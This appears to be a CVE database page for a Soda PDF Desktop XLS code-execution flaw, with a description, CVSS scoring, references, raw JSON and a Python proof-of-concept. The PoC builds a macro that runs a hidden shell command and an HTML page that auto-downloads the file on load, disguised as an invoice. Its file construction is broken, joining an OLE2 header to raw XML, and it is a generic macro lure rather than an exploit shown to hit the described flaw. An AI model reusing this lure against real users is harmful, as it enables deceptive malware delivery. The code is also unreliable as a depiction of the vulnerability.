Security Vulnerability Report
CVE-2025-14412 CVSS 7.8 HIGH

CVE-2025-14412

Published: 2025-12-23 22:15:48
Last Modified: 2026-01-21 20:29:33

Description

Soda PDF Desktop XLS File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of XLS files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27495.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:sodapdf:soda_pdf:14.0.509.23030:*:*:*:*:*:*:* - VULNERABLE
Soda PDF Desktop < latest version
Soda PDF Desktop XLS handling module, all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14412 PoC - Soda PDF Desktop XLS RCE
# This PoC demonstrates the insufficient UI warning when processing malicious XLS files


def create_malicious_xls():
    """
    Create a malicious XLS file with embedded executable content.
    The file exploits insufficient UI warnings in Soda PDF Desktop.
    """
    # XLS file structure (OLE2 Compound Document) magic bytes
    xls_header = b'\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1'

    # Workbook stream with macro content.
    # Note: an OLE2 header followed by raw XML is not a well-formed compound
    # document; this script only writes the bytes shown below.
    workbook_stream = b'''
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
  </sheets>
  <macros>
    <vbaProject>
      <!-- Malicious VBA macro code -->
      Sub Auto_Open()
        Shell "cmd.exe /c [malicious_command]", vbHide
      End Sub
    </vbaProject>
  </macros>
</workbook>
'''

    # Create malicious XLS file
    malicious_content = xls_header + workbook_stream
    output_path = "CVE-2025-14412_poc.xls"
    with open(output_path, 'wb') as f:
        f.write(malicious_content)

    print(f"[+] Created malicious XLS file: {output_path}")
    print("[+] When opened in Soda PDF Desktop, the macro will execute without proper warning")
    return output_path


def create_html_exploit():
    """
    Create HTML page that automatically downloads and triggers the XLS file.
    Attack vector: User visits malicious page -> downloads XLS -> opens in Soda PDF
    """
    html_content = '''
<!DOCTYPE html>
<html>
<head>
  <title>Document Preview</title>
</head>
<body>
  <script>
    // Auto-download malicious XLS file
    function downloadMaliciousFile() {
      var link = document.createElement('a');
      link.href = 'CVE-2025-14412_poc.xls';
      link.download = 'Invoice.xlsx'; // Masquerade as legitimate file
      document.body.appendChild(link);
      link.click();
      document.body.removeChild(link);
    }
    // Trigger download when page loads
    window.onload = downloadMaliciousFile;
  </script>
  <h1>Please wait, loading document...</h1>
</body>
</html>
'''
    output_path = "exploit_page.html"
    with open(output_path, 'w') as f:
        f.write(html_content)

    print(f"[+] Created HTML exploit page: {output_path}")
    return output_path


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-14412 Proof of Concept")
    print("Soda PDF Desktop XLS Insufficient UI Warning RCE")
    print("=" * 60)
    create_malicious_xls()
    create_html_exploit()
    print("\n[!] Usage: Host the HTML page and XLS file on a web server")
    print("[!] When victim opens the XLS file in Soda PDF Desktop, code executes")

References

https://www.zerodayinitiative.com/advisories/ZDI-25-1085/ (Third Party Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14412", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:48.007", "lastModified": "2026-01-21T20:29:33.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soda PDF Desktop XLS File Insufficient UI Warning Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Soda PDF Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the handling of XLS files. The issue results from allowing the execution of dangerous script without user warning. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-27495."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-356"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sodapdf:soda_pdf:14.0.509.23030:*:*:*:*:*:*:*", "matchCriteriaId": "ABC0E7B2-E242-4BD7-81E6-BA077750E564"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1085/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}